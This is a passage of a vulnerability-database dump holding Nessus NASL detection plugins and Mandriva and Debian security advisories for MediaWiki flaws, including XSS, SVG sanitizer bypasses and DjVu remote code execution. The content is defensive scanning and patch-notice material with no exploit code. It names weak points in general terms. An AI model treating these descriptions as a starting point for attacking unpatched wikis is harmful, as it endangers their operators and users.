Network Security, Inc.\");\n\n script_dependencies(\"mediawiki_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"installed_sw/MediaWiki\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MediaWiki\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\nversion = install['version'];\ninstall_url = build_url(qs:install['path'], port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Detecting for all previous versions.\nif (\n version =~ \"^1\\.21\\.[0-8]([^0-9]|$)\" ||\n version =~ \"^1\\.22\\.[0-5]([^0-9]|$)\"\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed versions : 1.21.9 / 1.22.6' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:03:51", "description": "- (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34 that caused pages to appear blank or with missing text.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-06T00:00:00", "type": "nessus", "title": "Fedora 20 : mediawiki-1.21.9-1.fc20 (2014-5684)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-5684.NASL", "href": "https://www.tenable.com/plugins/nessus/73874", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5684.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73874);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(67068);\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n\n script_name(english:\"Fedora 20 : mediawiki-1.21.9-1.fc20 (2014-5684)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in\n pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34\n that caused pages to appear blank or with missing\n text.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70094248\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.21.9-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:03:58", "description": "- (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34 that caused pages to appear blank or with missing text.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-06T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.21.9-1.fc19 (2014-5691)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-5691.NASL", "href": "https://www.tenable.com/plugins/nessus/73875", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5691.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73875);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(67068);\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.9-1.fc19 (2014-5691)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in\n pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34\n that caused pages to appear blank or with missing\n text.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6d8dee4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.9-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:057\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : mediawiki\r\n Date : 
March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated mediawiki packages fix multiple vulnerabilities:\r\n \r\n MediaWiki user Michael M reported that the fix for CVE-2013-4568\r\n allowed insertion of escaped CSS values which could pass the CSS\r\n validation checks, resulting in XSS (CVE-2013-6451).\r\n \r\n Chris from RationalWiki reported that SVG files could be uploaded\r\n that include external stylesheets, which could lead to XSS when an\r\n XSL was used to include JavaScript (CVE-2013-6452).\r\n \r\n During internal review, it was discovered that MediaWiki's SVG\r\n sanitization could be bypassed when the XML was considered invalid\r\n (CVE-2013-6453).\r\n \r\n During internal review, it was discovered that MediaWiki displayed some\r\n information about deleted pages in the log API, enhanced RecentChanges,\r\n and user watchlists (CVE-2013-6472).\r\n \r\n Netanel Rubin from Check Point discovered a remote code execution\r\n vulnerability in MediaWiki's thumbnail generation for DjVu\r\n files. Internal review also discovered similar logic in the PdfHandler\r\n extension, which could be exploited in a similar way (CVE-2014-1610).\r\n \r\n MediaWiki before 1.22.3 does not block unsafe namespaces, such as a\r\n W3C XHTML namespace, in uploaded SVG files. Some client software may\r\n use these namespaces in a way that results in XSS. This was fixed\r\n by disallowing uploading SVG files using non-whitelisted namespaces\r\n (CVE-2014-2242).\r\n \r\n MediaWiki before 1.22.3 performs token comparison that may be\r\n vulnerable to timing attacks. This was fixed by making token\r\n comparison use constant time (CVE-2014-2243).\r\n \r\n MediaWiki before 1.22.3 could allow an attacker to perform XSS attacks,\r\n due to flaw with link handling in api.php. 
This was fixed such that\r\n it won't find links in the middle of api.php links (CVE-2014-2244).\r\n \r\n MediaWiki has been updated to version 1.22.3, which fixes these issues,\r\n as well as several others.\r\n \r\n Also, the mediawiki-ldapauthentication and mediawiki-math extensions\r\n have been updated to newer versions that are compatible with MediaWiki\r\n 1.22.\r\n \r\n Additionally, the mediawiki-graphviz extension has been obsoleted,\r\n due to the fact that it is unmaintained upstream and is vulnerable\r\n to cross-site scripting attacks.\r\n \r\n Note: if you were using the instances feature in these packages to\r\n support multiple wiki instances, this feature has now been removed.\r\n You will need to maintain separate wiki instances manually.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6451\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6452\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6453\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6472\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2242\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2243\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2244\r\n http://advisories.mageia.org/MGASA-2014-0113.html\r\n http://advisories.mageia.org/MGASA-2014-0124.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 0763c6b913556fd3d098e14e6711d4c9 mbs1/x86_64/mediawiki-1.22.3-1.mbs1.noarch.rpm\r\n 3f3d638b7a09dfc700a56f06a0e06629 mbs1/x86_64/mediawiki-ldapauthentication-2.0f-1.mbs1.noarch.rpm\r\n c1bdd7ff8e5ab29f74891cb4fa92bff0 mbs1/x86_64/mediawiki-mysql-1.22.3-1.mbs1.noarch.rpm\r\n 6cd761769b330e837612ed079816019f 
mbs1/x86_64/mediawiki-pgsql-1.22.3-1.mbs1.noarch.rpm\r\n e484574d3776723c87e46a832daf3c4a mbs1/x86_64/mediawiki-sqlite-1.22.3-1.mbs1.noarch.rpm \r\n 870886ea628aaac381b4ab4210e33ea0 mbs1/SRPMS/mediawiki-1.22.3-1.mbs1.src.rpm\r\n bfbd6cc7fb3ce82be5c01564c5bfddde mbs1/SRPMS/mediawiki-ldapauthentication-2.0f-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIZKGmqjQ0CJFipgRAjIFAKCLVeGKatrjL2G/cYBZKCkekZ+BrgCdGfjO\r\naivXRBBXbumCTNMTeujkTrc=\r\n=5vFM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "[ MDVSA-2014:057 ] mediawiki", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6451"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30625", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30625", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": 
"2018-08-31T11:10:53", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3011-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nAugust 23, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mediawiki\r\nCVE ID : CVE-2014-5241 CVE-2014-5243\r\nDebian Bug : 752622 758510\r\n\r\nIt was discovered that MediaWiki, a website engine for collaborative\r\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\r\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\r\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\r\nversion 1.19.18, which includes additional changes.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1:1.19.18+dfsg-0+deb7u1.\r\n\r\nFor the unstable distribution (sid), these problems will be fixed soon.\r\n\r\nWe recommend that you upgrade your mediawiki packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG 
v1\r\n\r\niQIcBAEBCgAGBQJT+LEyAAoJEAVMuPMTQ89ERCAP/1LNJsl8+W5uJLY+bg2qWojz\r\nq/RhnhN4IUe3Koie9MS9Awc8j6C9MyGCqGiBxKPZwtPyxwLjwcj15zki5hV6Dbq+\r\nktbwqVEkmtb0kvGzm9XemkJQgtB5Uv4GWNju4uBAMLIzurxXSKyddgvHhhbRN7Y6\r\nWtZsBQGVvvofhuQs6jRtT30wQP1PIqmep/QFbMtZ7Fn7VUnof4a7CAJ7dzm3Lufj\r\nKbN1tgtFH2MHqPnazl/zzWAFIg2Bzqc1qLvuSwczRM56lUJ+34TT4EKXI7XmGUDN\r\njLUN2PIz3GabSVWCF6Q/yegh+26FI4S6Uf/ZETLOm+crYhfn86jl0XeTayCfbunq\r\n4ztzm3/CDZtVAaJGJANae+Fp63YavfyE7CVPE+wx94YCBAfEvDDuT8ZReYq/OrdE\r\niLbsFn5OEwxhuCL1RfOc9pkbTkskh2WigW9G7zDQ8e1PhgkO/KaY/wDsYREOmJfU\r\nuxBtkNpT22jbZegQJmsNzcnWKTh9u0tZMX+Z1f0vwmEFOpwVkNCGt+1A7znhAhkX\r\nNyEbEM3Mcvx/oF/6oa8aPfo2+I40YdFTnex/UMq9Bz4I1dOMoe2HXBz4smhulbbV\r\n/cG2ftlEFZE3g0cT2OdQZAE2Izs70xoL+BiL+kNhqAoFGO9gVY3z4lLLFDr3u82j\r\njFvHc+YgOGrQBMJSy90g\r\n=neUj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-08-26T00:00:00", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2014-08-26T00:00:00", "id": "SECURITYVULNS:DOC:31024", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31024", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:21", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-6233", "CVE-2013-6231", "CVE-2014-2655", "CVE-2013-6429", "CVE-2012-2983", "CVE-2014-1879", "CVE-2014-1888", "CVE-2014-0053", "CVE-2014-2244", "CVE-2014-1206", "CVE-2014-1454", "CVE-2013-4152", "CVE-2014-2685", "CVE-2014-1216", "CVE-2014-2327", "CVE-2014-1224", "CVE-2014-2570", "CVE-2014-0097", 
"CVE-2014-2279", "CVE-2014-2332", "CVE-2014-1695", "CVE-2014-2280", "CVE-2014-2242", "CVE-2014-0054", "CVE-2012-2981", "CVE-2014-2330", "CVE-2014-2043", "CVE-2013-7106", "CVE-2012-2982", "CVE-2014-2682", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6234", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-5951", "CVE-2014-2243", "CVE-2012-4893", "CVE-2014-2035", "CVE-2014-2040", "CVE-2014-2331", "CVE-2013-7196", "CVE-2013-7195", "CVE-2013-6452", "CVE-2014-2531", "CVE-2014-2329", "CVE-2014-1471", "CVE-2014-2684", "CVE-2013-6232", "CVE-2014-2326", "CVE-2014-1904", "CVE-2013-6451", "CVE-2014-1455", "CVE-2014-2278", "CVE-2014-1223", "CVE-2014-1222", "CVE-2014-1889", "CVE-2014-1694", "CVE-2013-7108", "CVE-2014-2683", "CVE-2014-2328", "CVE-2014-2681"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13733", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13733", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:50:18", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-08-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5025", "CVE-2014-5122", "CVE-2014-4722", "CVE-2014-2708", "CVE-2014-2327", "CVE-2014-0479", "CVE-2014-5243", "CVE-2014-0482", "CVE-2014-5241", "CVE-2014-5098", "CVE-2014-5339", "CVE-2014-0481", "CVE-2014-5097", "CVE-2014-3978", "CVE-2014-5262", "CVE-2014-5035", "CVE-2014-2709", "CVE-2014-5340", "CVE-2014-5026", "CVE-2014-5027", "CVE-2014-5261", "CVE-2014-5335", "CVE-2014-4002", "CVE-2014-2326", "CVE-2014-0480", "CVE-2014-5338", "CVE-2014-0483", "CVE-2014-3830", "CVE-2014-2328"], "modified": "2014-08-26T00:00:00", "id": "SECURITYVULNS:VULN:13930", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:13930", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-21T23:14:43", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nIn the Mediawiki update issued as DSA 2891-1, a few files were missing\nfrom the package. This update corrects that problem. For reference, the\noriginal advisory text follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be 
used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-03-31T17:07:21", "type": "debian", "title": "[SECURITY] [DSA 2891-2] mediawiki regression update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-31T17:07:21", "id": "DEBIAN:DSA-2891-2:4C744", "href": "https://lists.debian.org/debian-security-announce/2014/msg00065.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:14:46", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 30, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describes the following\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external 
